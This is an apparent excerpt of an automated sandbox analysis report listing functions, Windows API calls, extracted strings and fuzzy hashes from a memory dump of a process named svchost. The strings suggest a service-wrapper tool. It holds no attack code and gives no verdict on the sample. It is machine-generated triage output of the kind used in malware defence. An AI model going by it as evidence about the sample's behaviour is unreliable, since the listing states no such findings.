                                                    • Opcode Fuzzy Hash: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
                                                    • Instruction Fuzzy Hash: 6C31ADB66002006BD2049765DC82EEFB3A4EF8C324F84452FF509D7291F678E69587DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kill_console
                                                    • API String ID: 0-1600766264
                                                    • Opcode ID: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
                                                    • Instruction ID: 6b8feeb58a831c22132309c7bed50a8a77aa2e1ca0f50238c9c6c98eb8e5a449
                                                    • Opcode Fuzzy Hash: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
                                                    • Instruction Fuzzy Hash: 202106F6A0030067F6206665BC4AFEB325CCB8035CF45843AFA09E72C2F97DDC9145AA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
                                                    • Instruction ID: 426f323d08f1782c1e6f60194951a9d10300faf2c5e3bd40731d4607ec8a1430
                                                    • Opcode Fuzzy Hash: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
                                                    • Instruction Fuzzy Hash: 0041B772A042015FC720DB55DC45BEBB3E8EBC8754F04492AF95483240E7B8E9C5C7A6
                                                    APIs
                                                    • GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                    • FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                    • FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                    • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                    • __snwprintf_s.LIBCMT ref: 004053DC
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FormatHeapMessage$AllocDefaultLangProcessUser__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: system error %lu
                                                    • API String ID: 3208699588-1824642319
                                                    • Opcode ID: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
                                                    • Instruction ID: accda3c8b7d2623306d44ba6687032fe0a4120849f219a87f72b30063895a064
                                                    • Opcode Fuzzy Hash: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
                                                    • Instruction Fuzzy Hash: 5A01A7F16043127BE610A7659C09FBB7B9CDF807A1F10453AFA10D61C0E7B4D4059A78
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004122FA
                                                    • HeapFree.KERNEL32(00000000), ref: 00412301
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
                                                    • API String ID: 3859560861-2402770260
                                                    • Opcode ID: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
                                                    • Instruction ID: 3fa550764ded5b60e080b7974a66712a4ad7996e9d168e8143a02efed0acfda5
                                                    • Opcode Fuzzy Hash: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
                                                    • Instruction Fuzzy Hash: BC21AFFE6003051BD600DB79AEC99AB335CEB85309F18896AFC14C2341E37DECD49269
                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,?), ref: 00408267
                                                    • GetLastError.KERNEL32 ref: 0040827B
                                                    • __cftoe.LIBCMT ref: 0040828F
                                                      • Part of subcall function 00413380: __mbstowcs_s_l.LIBCMT ref: 00413396
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082A7
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004082AA
                                                    • __cftoe.LIBCMT ref: 004082C7
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082F9
                                                    • HeapFree.KERNEL32(00000000), ref: 004082FC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process__cftoe$AddressAllocErrorFreeLastProc__mbstowcs_s_l
                                                    • String ID:
                                                    • API String ID: 323180873-0
                                                    • Opcode ID: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
                                                    • Instruction ID: 2e5e402e2c2626b49358907e613a0df75488633df38e2a23a78af6a6010d2103
                                                    • Opcode Fuzzy Hash: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
                                                    • Instruction Fuzzy Hash: C911D2B1505310BBC3109B55DC49F9BB7ACEF89718F10466DF915A7282DA34D800CB7A
                                                    APIs
                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 004057AF
                                                    • EnableWindow.USER32(00000000), ref: 004057B8
                                                    • GetDlgItem.USER32(00000000,0000040F), ref: 004057CA
                                                    • EnableWindow.USER32(00000000), ref: 004057CD
                                                    • GetDlgItem.USER32(00000000,00000410), ref: 004057DB
                                                    • EnableWindow.USER32(00000000), ref: 004057DE
                                                    • GetDlgItem.USER32(00000000,00000411), ref: 004057ED
                                                    • EnableWindow.USER32(00000000), ref: 004057F0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnableItemWindow
                                                    • String ID:
                                                    • API String ID: 3833022359-0
                                                    • Opcode ID: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
                                                    • Instruction ID: e2f7c1c09c8d93b2009dc5b4c4f002420ea12ae4a46ab4e20d95bb4881afef45
                                                    • Opcode Fuzzy Hash: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
                                                    • Instruction Fuzzy Hash: 37F0AEF1F4031C36D610E7B57C84D676B6CEBC4591B058436B700D3190CDF8EA058A74
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _fwprintf
                                                    • String ID: %s
                                                    • API String ID: 394020290-620797490
                                                    • Opcode ID: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
                                                    • Instruction ID: 75f6ff0ad44b13ca8f97eaa8f5d04c03990c627219346353a10bb8e85013ff75
                                                    • Opcode Fuzzy Hash: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
                                                    • Instruction Fuzzy Hash: EC4135B1A0020067E6105B79AD49BAB73489B44329F14023AF715E72E2E778CC92D6AD
                                                    APIs
                                                      • Part of subcall function 004084D0: __snwprintf_s.LIBCMT ref: 00408511
                                                    • _memset.LIBCMT ref: 0040B4CF
                                                    • _memset.LIBCMT ref: 0040B544
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _memset$__snwprintf_s
                                                    • String ID: AppStderr$AppStdin$AppStdout
                                                    • API String ID: 2562117923-491939989
                                                    • Opcode ID: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
                                                    • Instruction ID: 1b06f4d84a2b42bb779b35d5d98be90b00d199c4a4a766b1a98f55c8d30fc170
                                                    • Opcode Fuzzy Hash: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
                                                    • Instruction Fuzzy Hash: B24180F2644305BBE320DE55EC42F97B3ECEF84755F10042EF2598A2C1EBB5A5488BA5
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 004102F8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004102FB
                                                    • __snwprintf_s.LIBCMT ref: 0041031D
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041032E
                                                    • HeapFree.KERNEL32(00000000), ref: 00410331
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree__snwprintf_s
                                                    • String ID: value_from_string()
                                                    • API String ID: 2465375985-962593079
                                                    • Opcode ID: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
                                                    • Instruction ID: bb1032cf64baaab7dc3efed814e35f34ffcfd1963eead0c03da6be78f6f1ad05
                                                    • Opcode Fuzzy Hash: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
                                                    • Instruction Fuzzy Hash: 271129B26042156BD71067AADC45FE7339CDF91369F004666FC29C72C0E6F8E8C08669
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$ExtensionFindPathSystemTime
                                                    • String ID: %s%s$-%04u%02u%02uT%02u%02u%02u.%03u%s
                                                    • API String ID: 104670371-3937541175
                                                    • Opcode ID: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
                                                    • Instruction ID: b79bb978c2d6968e54da41b461fb302b9f59bf9436526885e0c642140c4c9fbb
                                                    • Opcode Fuzzy Hash: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
                                                    • Instruction Fuzzy Hash: 6111B4B15143116ED334DB55DC41DBBB3E8EFC8B10F40892EB9A9C22D1EABC9580D7A5
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 004051DC
                                                    • _memset.LIBCMT ref: 004051EB
                                                    • CreateProcessW.KERNEL32 ref: 0040522C
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0040523D
                                                    • GetLastError.KERNEL32 ref: 0040525A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateErrorFileLastModuleNameTerminate_memset
                                                    • String ID: D
                                                    • API String ID: 3492820992-2746444292
                                                    • Opcode ID: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
                                                    • Instruction ID: ec264b7909b663423e436220cfe4819a88d4f1dffac62785d33a99ea7066e5a1
                                                    • Opcode Fuzzy Hash: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
                                                    • Instruction Fuzzy Hash: B11154B1654300AFD320DB64DD46BEB77E4AF8C704F40482DB699D61D0EBB895488F96
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00415994
                                                      • Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
                                                      • Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441
                                                    • __amsg_exit.LIBCMT ref: 004159B4
                                                    • __lock.LIBCMT ref: 004159C4
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004159E1
                                                    • InterlockedIncrement.KERNEL32(01302250), ref: 00415A0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID: H*B
                                                    • API String ID: 4271482742-1987176958
                                                    • Opcode ID: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
                                                    • Instruction ID: 0f1790ebc6eee61fc3f291717e61b7ca4878fd8235e58e257555a432dd93126f
                                                    • Opcode Fuzzy Hash: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
                                                    • Instruction Fuzzy Hash: F2012B71A10B21EBC720AB25A4053DE77B0BF80724F01015BE804A3380C7BC99C2CBCE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: get_service_dependencies()$lpDependencies
                                                    • API String ID: 0-219018013
                                                    • Opcode ID: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
                                                    • Instruction ID: 3e3e4e8d9a81c198e56250067319da3111a355b174864df4f52def3845c595e2
                                                    • Opcode Fuzzy Hash: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
                                                    • Instruction Fuzzy Hash: 3F51C1B19002019FD724DF99D880AA7B3F5FF94315F24492EE885972C1EB78E898CB95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
                                                    • Instruction ID: 41e637edb1b435abd6f35276a328e9c15e151e7885b7bbb8ba59d22f3675d668
                                                    • Opcode Fuzzy Hash: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
                                                    • Instruction Fuzzy Hash: 9F21F4F2900200B7D710ABA6FC89FDB7B6CDF9935AF00403AFA48D6142E779D4558A79
                                                    APIs
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00405601
                                                    • FindResourceExW.KERNEL32(00000000,00000005,?,?), ref: 00405616
                                                    • GetLastError.KERNEL32(?,?), ref: 0040561C
                                                    • FindResourceExW.KERNEL32(00000000,00000005,?,00000000,?,?), ref: 00405634
                                                    • LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0040563D
                                                    • CreateDialogIndirectParamW.USER32(00000000,00000000,?,?,?), ref: 00405659
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
                                                    • String ID:
                                                    • API String ID: 940021595-0
                                                    • Opcode ID: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
                                                    • Instruction ID: e476e4ad9c0365e054dca9b840df72f2dc216dd3d76c2c72e3c00f538e0b4bad
                                                    • Opcode Fuzzy Hash: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
                                                    • Instruction Fuzzy Hash: 24F09AB0708600BAE2505B64BC09FBB2768DBC4B12F408525F958D61C0EA78D8018E79
                                                    APIs
                                                    • GetDlgItem.USER32(00000000,00000406), ref: 0040583A
                                                    • EnableWindow.USER32(00000000), ref: 00405843
                                                    • GetDlgItem.USER32(00000000,00000407), ref: 00405852
                                                    • EnableWindow.USER32(00000000), ref: 00405855
                                                    • GetDlgItem.USER32(00000000,00000408), ref: 00405864
                                                    • EnableWindow.USER32(00000000), ref: 00405867
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnableItemWindow
                                                    • String ID:
                                                    • API String ID: 3833022359-0
                                                    • Opcode ID: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
                                                    • Instruction ID: 2ec9d1a14a3b6aefc49800d07f008e7303e744d1587428ffcda7d95d197ea67b
                                                    • Opcode Fuzzy Hash: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
                                                    • Instruction Fuzzy Hash: A8E012F2B0131476D520EBFA9CD8C97ABACEFC9A51B418815B74497050C979D502C778
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem
                                                    • API String ID: 0-3718507506
                                                    • Opcode ID: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
                                                    • Instruction ID: c55ad329f1ab7e7a319801d33323cd4f3fc7c6193fc44e9fe0b0950f6bea607c
                                                    • Opcode Fuzzy Hash: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
                                                    • Instruction Fuzzy Hash: 1C512A72E043405BD6205779BC45BD737989B81738F08063AFE65D73E1E72CEC8882AA
                                                    APIs
                                                      • Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                      • Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                    • __snwprintf_s.LIBCMT ref: 0040FF11
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040FF73
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap__snwprintf_s$AllocFreeLocalProcess__vsnwprintf_s_l_vfwprintf
                                                    • String ID: pre_install_service()$service
                                                    • API String ID: 792397322-3337766052
                                                    • Opcode ID: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
                                                    • Instruction ID: 26704b136dc3d9749b1074aa21864745be87e0fb96ff5d59f0470137026c55c2
                                                    • Opcode Fuzzy Hash: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
                                                    • Instruction Fuzzy Hash: 614170B29003026BC710EA54DC82EA77354EF91318F14413FF914A72C2E63DF9598799
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
